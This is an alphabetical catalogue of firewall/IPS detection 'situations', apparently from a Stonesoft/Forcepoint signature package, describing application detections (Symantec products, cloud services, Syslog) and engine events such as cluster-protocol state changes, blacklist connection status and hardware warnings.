About this situation: Endpoint Context Agent based Symantec Diagnostic Tool detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-992-5242
Description: Symantect Diagnostic Tool endpoint application was detected. This tool collects diagnostic information from applications developed by Symantec and provides support options.
Back to top

Symantec-AntiVirus-Update

About this situation: Symantec AntiVirus Update traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-767-5211
Description: Symantec AntiVirus is an antivirus product which provides malware prevention and removal during asubscription period.
Back to top

Symantec-Backup-Exec

About this situation: Symantec Backup Exec usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Storage
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-595-5211
Description: Symantec Backup Exec 2012 is a data management solution for Windows servers networks. It provides fast and reliable backup and restore capabilities for servers, applications and workstations across the network.
Back to top

Symantec-CDN

About this situation: Symantec content delivery network usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-614-5211
Description: Symantec content delivery network usage has been detected.
Back to top

Symantec-OCSP

About this situation: Symantec Online Certificate Status service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1757-5242
Description: Online Certitificate Status Protocol (OCSP) is used to validate status of Extended Validation Certificates (EV certificates) used with HTTPS.
Back to top

Symantec-pcAnywhere

About this situation: Symantec pcAnywhere traffic
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: Symantec's pcAnywhere product is a multiplatform remote desktop solution. The product runs on Windows, Linux, Mac OSX, Windows Mobile devices and through web browsers. The product is a feature rich remote desktop solution offering file transfer, command queueing, remote processes management and chat.
Back to top

Symbaloo

About this situation: Application Symbaloo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Symbaloo is a cloud-based application that allows users to organize and categorize web links in the form of buttons.
Back to top

Symform-Storage-Cloud

About this situation: Application Symform-Storage-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Symform is a revolutionary cloud storage backup service providing free or affordable unlimited online storage.
Back to top

Symphony

About this situation: Application Symphony detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Symphony is a cloud-based communications platform that connects markets and individuals. It transforms the way users communicate with a single workflow application.
Back to top

Symphony-Summit

About this situation: Application Symphony-Summit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Symphony SUMMIT is a provider of a private and public cloud based IT Operations Management Solution to enterprises and service providers.
Back to top

Symplified

About this situation: Application Symplified detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Symplified is an Identity as a Service
Back to top

Symu.co

About this situation: Application Symu.co detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Symu - tool for webdesigners that allow show your web design in a web browser,
Back to top

SymVolli

About this situation: Application SymVolli detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SymVolli is Sales Performance Management tool.
Back to top

Synata

About this situation: Application Synata detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Synata, an enterprise cloud search engine, enables users to find files, emails, contacts and other information across software used at work. Synata connects users to their company's structured and unstructured data and they can find information across Salesforce, Google Apps, Box, Dropbox, Zendesk, JIRA, Workday, Sharepoint, Exchange.
Back to top

Syncd

About this situation: Syncd usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Syncd flexible reports help make sense of your time and expenses. Generate billing reports for clients, expense reimbursement reports for employees, and time utilization reports to analyze company performance.
Back to top

SyncHR

About this situation: Application SyncHR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SyncHR reinvents the management of HR, benefits and payroll with its single application and single database.
Back to top

Synchronize Administrators on SMC Appliance: execution failed

About this situation: Synchronize Administrators: execution failed on SMC Appliance
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1296-5242
Description: SMC Appliance could not synchronize administrators with superuser privileges.
Back to top

Synchronize Administrators: execution failed

About this situation: Synchronize Administrators: execution failed on engine node
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-1296-5242
Description: Engine node doesn't synchronize administrators.
Back to top

Synchroteam

About this situation: Application Synchroteam detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Synchroteam helps businesses in many industries manage their mobile workers, simplify their processes and optimize their costs per revenue. It shows you in real-time the location of your offices, workers, customers and displays them on a map. The mobile client that comes with Synchroteam is available for iOS and Android platforms.
Back to top

Syncplicity

About this situation: Syncplicity usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: The service allows users to store and sync files online between computers. It supports Microsoft Windows and Mac OS X. Source: Wikipedia
Back to top

Synergita

About this situation: Application Synergita detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Synergita is a cloud based, continuous HR Performance Management Software
Back to top

Synergy

About this situation: Synergy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-648-5211
Description: Synergy is an application used to share keyboard and mouse between multiple computers. The application uses an open source protocol over TCP.
Back to top

SYNNEX-Canada

About this situation: Application SYNNEX-Canada detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SYNNEX Canada Limited, a wholly-owned subsidiary of SYNNEX Corporation, is distributor of technology products to more than 8,000 resellers throughout Canada.
Back to top

Synology

About this situation: Application Synology detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Synology is dedicated to provide DiskStation Network Attached Storage that offers RAID storage, storage for virtualization, backup, NVR, and mobile app support.
Back to top

Synology-DSM

About this situation: Synology DSM usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Storage
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Description: Synology DSM (DiskStation Manager) usage detected. Synology DSM is a tool for remote management of Synology NAS-devices.
Back to top

Syntryx

About this situation: Application Syntryx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Syntryx provides robust information for Affiliate Marketing, SEO and Competitive Intelligence. At the very least all companies should be at the baseline with their competitors, Syntryx helps achieve that goal.
Back to top

Synygy

About this situation: Application Synygy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Synygy provides consulting, technology, and outsourcing services related to incentive compensation management and sales performance management, with a focus on for sales strategy enablement, sales force motivation, sales channel effectiveness, and sales performance insight.
Back to top

Syslog

About this situation: Syslog traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-741-5211
Description: Syslog is a standard for network decives to send event messages to a logging server. Syslog protocol is supported by a wide range of devices.
Back to top

SysnetGlobalSolutions

About this situation: Application SysnetGlobalSolutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SysnetGlobalSolutions provides payment card industry compliance services.
Back to top

Sysomos

About this situation: Application Sysomos detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sysomos offers social media monitoring tools that deliver actionable data.
Back to top

System-ID-Barcode-Solutions

About this situation: Application System-ID-Barcode-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: System ID Barcode Solutions provides automation solutions and barcoding equipment to companies in industry sector.
Back to top

System76

About this situation: Application System76 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: System76 is a computer manufacturer specializing in the sale of notebooks, desktops, and servers. They are notable for their support of Open source software, only offering Ubuntu as the installed operating system.
Back to top

System_Alert-Log

About this situation: Log alert
Context: Log alert
Severity: 7
Tags: NGFW
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Generic alert message. Read info field for more.
Back to top

System_Analyzer-Started

About this situation: Analyzer process started at engine node.
Context: Analyzer situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-394-4219
Description: Analyzer process was started.
Back to top

System_Backup-Analyzer-Connection

About this situation: Backup analyzer connection in use
Context: Sensor engine situation
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: The primary analyzer connection failed, and the sensor started to use the backup connection.
Back to top

System_Blacklist-Connection-Failed

About this situation: Firewall blacklist connection failed
Context: Analyzer situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-106-2032
Description: Blacklist connection to firewall failed. Opening an authenticated connection to the firewall failed.
Back to top

System_Blacklist-Connection-Succeeded

About this situation: Firewall blacklisting connection succeeded
Context: Analyzer situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-106-2032
Description: Blacklist connection to firewall succeeded. The connection to the firewall was successfully opened and authenticated.
Back to top

System_Blacklist-Request-Discarded

About this situation: Blacklist request was discarded
Context: Analyzer situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-106-2032
Description: Too many blacklist requests in queue. The blacklist entry was discarded. The blacklist module stores the received blacklisting requests in a queue until they are sent to the firewall. The queue has a limited size. This event was generated because the queue was full when yet another request was received. The new request was discarded.
Back to top

System_Blacklist-Request-Rejected

About this situation: Blacklist request was rejected
Context: Analyzer situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-106-2032
Description: Blacklist request was rejected by the firewall. The blacklist module sent a blacklisting request to the firewall, but the firewall rejected the request.
Back to top

System_Cluster-Protocol-Auto-Online

About this situation: Automatic online transition.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol is trying to change status to online. This message indicates automatic online transition after a boot or after a test failure recovery.
Back to top

System_Cluster-Protocol-Auto-Standby

About this situation: Automatic standby transition.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol is trying to change status to standby. This message indicates automatic standby transition after a boot or after a test failure recovery.
Back to top

System_Cluster-Protocol-Cannot-Create-Lockfile-Name

About this situation: Cannot create lockfile name
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Cannot create lockfile name.
Back to top

System_Cluster-Protocol-Clustering-Subsystem-Failed-To-Execute-A-Command

About this situation: Clustering subsystem failed to execute a command
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Clustering subsystem failed to execute a command.
Back to top

System_Cluster-Protocol-Command-No

About this situation: Command not accepted.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol cannot execute a command. The reason can be one of the following: * There is no cluster protocol configuration. * All cluster protocol interfaces are down. * The capture interface is not ready. * The command is not applicable, protocol is already in the desired state or the transition is not possible. * The engine node is either a single engine or the last node remaining online in a cluster, and tester attempted to set it offline, which is not allowed by default. This can be overridden by using "Force Offline" as test failure action.
Back to top

System_Cluster-Protocol-Couldnt-Connect-To-Management-Daemon

About this situation: Couldnt connect to management daemon
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Couldn't connect to management daemon.
Back to top

System_Cluster-Protocol-Cpauth-Error

About this situation: Cluster protocol authentication error.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: An error occurred when trying to either sign a cluster protocol message or verify a signature.
Back to top

System_Cluster-Protocol-Cpauth-Failed

About this situation: Could not sign cluster protocol message.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Failed to create a signature for cluster protocol message.
Back to top

System_Cluster-Protocol-Cpauth-Init

About this situation: Failed to initialize cluster protocol authentication.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol authentication initialization failed.
Back to top

System_Cluster-Protocol-Cpauth-Invalid

About this situation: Unauthenticated cluster protocol message.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol failed to verify the signature of a received protocol message. In addition to malicious cases, this log message is also possible if clusters that have different management servers share cluster protocol network.
Back to top

System_Cluster-Protocol-Cpauth-Newkey

About this situation: Cluster protocol authentication masterkey updated.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol received a new authentication key and started using it.
Back to top

System_Cluster-Protocol-Cpauth-Overmax

About this situation: Unsupported minimum cluster protocol authentication level requested.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Configuration requests for an unsupported cluster protocol authentication level. The closes supported level will be used.
Back to top

System_Cluster-Protocol-Error-Lock-Create

About this situation: Failed to create lock file.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Failed to create a lock file. Locked offline state may not work as desired.
Back to top

System_Cluster-Protocol-Error-Lock-Remove

About this situation: Failed to remove lock file.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Failed to remove a lock file.
Back to top

System_Cluster-Protocol-Event

About this situation: Cluster protocol event.
Context: Cluster protocol situation
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol related event occurred.
Back to top

System_Cluster-Protocol-Failed-To-Read-From-The-Management-Daemon

About this situation: Failed to read from the management daemon
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to read from the management daemon.
Back to top

System_Cluster-Protocol-Go-Lockedoffline

About this situation: Going locked offline by command.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol received lock offline command.
Back to top

System_Cluster-Protocol-Go-Lockedonline

About this situation: Going locked online by command.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol received lock online command.
Back to top

System_Cluster-Protocol-Go-Offline

About this situation: Going offline by command.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol received go offline command.
Back to top

System_Cluster-Protocol-Go-Online

About this situation: Going online by command.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol received go online command.
Back to top

System_Cluster-Protocol-Go-Standby

About this situation: Going standby by command.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol received go standby command.
Back to top

System_Cluster-Protocol-Interrupted

About this situation: Command interrupted.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Failed to send command to cluster protocol. Command was interrupted.
Back to top

System_Cluster-Protocol-Msgqueue-Full

About this situation: Cluster protocol message queue is full.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol is receiving messages faster than it can process them. Received cluster protocol packets may be dropped.
Back to top

System_Cluster-Protocol-No-Capacity

About this situation: No capacity configured.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol configuration contains no capacity value. The cluster protocol will use a default value.
Back to top

System_Cluster-Protocol-No-Such-Dev

About this situation: Device not found.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol could not find a configured protocol device.
Back to top

System_Cluster-Protocol-Node-Active

About this situation: Became active.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Node became active.
Back to top

System_Cluster-Protocol-Node-Lockedoffline

About this situation: Went locked offline.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Node status changed to locked offline.
Back to top

System_Cluster-Protocol-Node-Lockedonline

About this situation: Went locked online.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Node status changed to locked online.
Back to top

System_Cluster-Protocol-Node-Offline

About this situation: Went offline.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Node status changed to offline.
Back to top

System_Cluster-Protocol-Node-Online

About this situation: Went online.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Node status changed to online.
Back to top

System_Cluster-Protocol-Node-Passive

About this situation: Became passive.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Node became passive.
Back to top

System_Cluster-Protocol-Node-Standby

About this situation: Went standby.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Node status changed to standby.
Back to top

System_Cluster-Protocol-Pairing-Done

About this situation: Pairing done.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Pairing done.
Back to top

System_Cluster-Protocol-Pairing-Failed

About this situation: Pairing failed.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Pairing failed.
Back to top

System_Cluster-Protocol-Pairing-In-Progress

About this situation: Pairing in progress.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Pairing in progress.
Back to top

System_Cluster-Protocol-Pairing-Started

About this situation: Pairing started.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Pairing started.
Back to top

System_Cluster-Protocol-Pairing-Waiting

About this situation: Waiting for pair.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Waiting for pair.
Back to top

System_Cluster-Protocol-Reset

About this situation: Cluster protocol reset.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol needed to reinitialize. This usually results from changed node identifier. As a result this node may have temporarily lost connection to other nodes.
Back to top

System_Cluster-Protocol-Set-Passive-Active

About this situation: Setting passive node to active by command.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Cluster protocol received passive to active command.
Back to top

System_Cluster-Protocol-Set-Passive-Lockedoffline

About this situation: Setting passive node to locked offline by command.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Cluster protocol received passive to locked offline command.
Back to top

System_Cluster-Protocol-Set-Passive-Offline

About this situation: Setting passive node to offline by command.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Cluster protocol received passive to offline command.
Back to top

System_Cluster-Protocol-Set-Passive-Online

About this situation: Setting passive node to online by command.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Cluster protocol received passive to online command.
Back to top

System_Cluster-Protocol-Set-Passive-Standby

About this situation: Setting passive node to standby by command.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Cluster protocol received passive to standby command.
Back to top

System_Cluster-Protocol-Single-IP-HA-Configured

About this situation: Single IP HA is configured.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Single IP HA is configured.
Back to top

System_Cluster-Protocol-Single-IP-HA-Disabled

About this situation: Single IP HA is disabled.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Single IP HA is disabled.
Back to top

System_Cluster-Protocol-Single-IP-HA-Enabled

About this situation: Single IP HA is enabled.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description: Single IP HA is enabled.
Back to top

System_Cluster-Protocol-Test-Forceoffline

About this situation: Force offline by test failure.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol is attempting to change current status to locked offline due to a test failure.
Back to top

System_Cluster-Protocol-Test-Offline

About this situation: Going offline by test failure.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Cluster protocol is attempting to change current status to offline due to a test failure.
Back to top

System_Cluster-Protocol-Timeout

About this situation: Command timeout.
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: A timeout occurred while attempting to execute a cluster protocol command. The command was not finished in expected time.
Back to top

System_Cluster-Protocol-Too-Many-Scripts-Running

About this situation: Too many scripts running
Context: Cluster protocol situation
Severity: 10
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Too many scripts running.
Back to top

System_Compress-Hash-Table-Full

About this situation: Compress hash table full
Context: Analyzer situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-414-4219
Description: Compress hash table is full. The Compress agent received so many different events that the size of the agent's internal event table became full before the time window had elapsed. The table size is increased unless it has reached the maximum size. This event can normally occur a few times as the agent adjusts the table size. If this event occurs continuously, the requested compression may take too much memory; the time window may be too large, or the similarity conditions may be too strict.
Back to top

System_Count-Hash-Table-Full

About this situation: Count hash table full
Context: Analyzer situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-414-4219
Description: Count hash table is full. The Count agent received so many different events that the size of the agent's internal event table became full before the time window had elapsed. The latest event is not counted. The similarity conditions for the events may be too strict.
Back to top

System_Engine-bypass-error

About this situation: hardware info
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: Some bypass adapter has went into wrong mode in relation to the engine state.
Back to top

System_Engine-bypass-info

About this situation: hardware info
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-576-5211
Description: Bypass adapters are ok.
Back to top

System_Engine-bypass-warning

About this situation: hardware info
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: Some bypass adapter has went into wrong mode in relation to the engine state.
Back to top

System_Engine-cputemp-error

About this situation: cpu temperature error
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: CPU temperature has exceeded the critical limit.
Back to top

System_Engine-cputemp-warning

About this situation: cpu temperature warning
Context: Engine situations
Severity: 5
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: CPU temperature has been raised.
Back to top

System_Engine-Cryptkeys-Changed

About this situation: CryptKeys are changed
Context: Cryptkeys operation
Severity: 5
Tags: NGFW
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: CryptKeys are changed
Back to top

System_Engine-Cryptkeys-Created

About this situation: CryptKeys created
Context: Cryptkeys operation
Severity: 5
Tags: NGFW
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: CryptKeys are created
Back to top

System_Engine-Cryptkeys-Deleted

About this situation: CryptKeys are deleted
Context: Cryptkeys operation
Severity: 5
Tags: NGFW
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: CryptKeys are deleted
Back to top

System_Engine-Cryptkeys-Imported

About this situation: CryptKeys are imported
Context: Cryptkeys operation
Severity: 5
Tags: NGFW
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: CryptKeys are imported
Back to top

System_Engine-dmi-appliance-ok

About this situation: hardware error
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Stonesoft appliance verification ok.
Back to top

System_Engine-dmi-hwcheck-error

About this situation: hardware error
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Stonesoft appliance hardware configuration mismatch detected.
Back to top

System_Engine-dmi-hwcheck-sigcheck-error

About this situation: hardware error
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Stonesoft appliance hardware configuration and DMI mismatch detected.
Back to top

System_Engine-dmi-sigcheck-error

About this situation: hardware error
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Stonesoft appliance DMI mismatch detected.
Back to top

System_Engine-fan-error

About this situation: fan error
Context: Engine situations
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: System fan has stopped or severely slowed down.
Back to top

System_Engine-fan-info

About this situation: fan info
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-576-5211
Description: System fans are ok.
Back to top

System_Engine-fan-warning

About this situation: fan warning
Context: Engine situations
Severity: 4
Tags: NGFW
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: System fan speed has been reduced.
Back to top

System_Engine-filesystem-error

About this situation: hardware info
Context: Engine situations
Severity: 8
Tags: NGFW
